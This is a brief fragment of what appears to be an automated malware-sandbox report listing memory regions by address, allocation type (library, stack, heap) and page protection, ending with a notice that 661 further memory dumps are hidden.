page read and write
2531000
trusted library allocation
page read and write
2FE000
stack
page read and write
216A0000
trusted library allocation
page read and write
260000
trusted library allocation
page read and write
618E000
stack
page read and write
28A000
trusted library allocation
page execute and read and write
899000
trusted library allocation
page read and write
6510000
heap
page read and write
4AA0000
trusted library allocation
page read and write
2139E000
stack
page read and write
42F000
heap
page read and write
1F92000
heap
page read and write
221BB000
trusted library allocation
page read and write
223CB000
trusted library allocation
page read and write
216C0000
trusted library allocation
page read and write
There are 661 hidden memdumps, click here to show them.